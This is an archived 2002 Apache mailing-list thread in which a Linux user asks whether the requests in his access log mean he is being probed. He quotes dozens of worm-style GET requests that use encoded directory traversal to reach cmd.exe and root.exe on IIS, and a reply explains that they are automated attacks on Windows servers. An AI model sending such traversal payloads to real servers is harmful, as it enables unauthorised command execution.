You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by "Jack L. Stone" <ja...@sage-one.net> on 2002/07/28 18:01:34 UTC
Re: Am I being probed?
At 06:03 PM 7.28.2002 +0200, eric wrote:
>Greetings!
>
>I'm a newbie when it comes to many *nix things and Apache is one of them.
>
>I have two machines, one running Suse 8.0 and the other running WinME. Both
>of them are hooked up to a LinkSys EtherFast DSL router. My Suse box is
>running Apache 2.0.39.
>
>I use WinMe to connect to the web server. It's address is 192.168.1.100 and
>the Suse box is 192.168.1.101.
>
>I was going through my Apache access log and found these entries:
>
>217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:10 +0200] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:15 +0200] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:21 +0200] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:32 +0200] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:38 +0200] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:44 +0200] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:50 +0200] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:56 +0200] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:02 +0200] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:08 +0200] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:14 +0200] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.40.62 - - [27/Jul/2002:19:17:19 +0200] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.40.62 - - [27/Jul/2002:19:17:25 +0200] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:31 +0200] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>217.235.140.189 - - [27/Jul/2002:19:45:51 +0200] "GET
/scripts/root.exe?/c+dir
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:57 +0200] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>217.228.92.217 - - [27/Jul/2002:20:30:53 +0200] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.92.217 - - [27/Jul/2002:20:30:54 +0200] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.92.217 - - [27/Jul/2002:20:30:56 +0200] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.92.217 - - [27/Jul/2002:20:30:57 +0200] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:55 +0200] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>and there's a few more.
>
>What's going on here? Is there anyway I can find out? Should I bother?
>Should I care?
>
>Thanks, Eric
>
You would only need to care if you were running a WIN server... it is
probably the "script kiddies" trying to wreak some havoc by trying to run
their scripts (worm) on yours/any machine in its search on the net....
Best regards,
Jack L. Stone,
Administrator
SageOne Net
http://www.sage-one.net
jackstone@sage-one.net
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Am I being probed?
Posted by eric <er...@t-online.de>.
Jack,
Thanks!
On Sunday 28 July 2002 18:01, Jack L. Stone wrote:
> At 06:03 PM 7.28.2002 +0200, eric wrote:
> >Greetings!
> >
> >I'm a newbie when it comes to many *nix things and Apache is one of them.
> >
> >I have two machines, one running Suse 8.0 and the other running WinME.
> > Both of them are hooked up to a LinkSys EtherFast DSL router. My Suse
> > box is running Apache 2.0.39.
> >
> >I use WinMe to connect to the web server. It's address is 192.168.1.100
> > and the Suse box is 192.168.1.101.
> >
> >I was going through my Apache access log and found these entries:
> >
> >217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:10 +0200] "GET /MSADC/root.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:15 +0200] "GET
> >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:21 +0200] "GET
> >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET
> >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:32 +0200] "GET
> >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:38 +0200] "GET
> >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:44 +0200] "GET
> >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> >s
>
> ystem32/cmd.exe?/c+dir
>
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:50 +0200] "GET
> >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:56 +0200] "GET
> >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:02 +0200] "GET
> >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:08 +0200] "GET
> >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:14 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.40.62 - - [27/Jul/2002:19:17:19 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.40.62 - - [27/Jul/2002:19:17:25 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:31 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >217.235.140.189 - - [27/Jul/2002:19:45:51 +0200] "GET
>
> /scripts/root.exe?/c+dir
>
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
> > /MSADC/root.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
> >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
> >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
> >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
> >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
> >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
> >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> >s
>
> ystem32/cmd.exe?/c+dir
>
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
> >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
> >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET
> >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET
> >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:57 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >217.228.92.217 - - [27/Jul/2002:20:30:53 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.92.217 - - [27/Jul/2002:20:30:54 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.92.217 - - [27/Jul/2002:20:30:56 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.92.217 - - [27/Jul/2002:20:30:57 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /MSADC/root.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET
> >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
> >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
> >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
> >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
> >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
> >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> >s
>
> ystem32/cmd.exe?/c+dir
>
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
> >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
> >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
> >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
> >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:55 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >and there's a few more.
> >
> >What's going on here? Is there anyway I can find out? Should I bother?
> >Should I care?
> >
> >Thanks, Eric
>
> You would only need to care if you were running a WIN server... it is
> probably the "script kiddies" trying to wreak some havoc by trying to run
> their scripts (worm) on yours/any machine in its search on the net....
>
> Best regards,
> Jack L. Stone,
> Administrator
>
> SageOne Net
> http://www.sage-one.net
> jackstone@sage-one.net
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org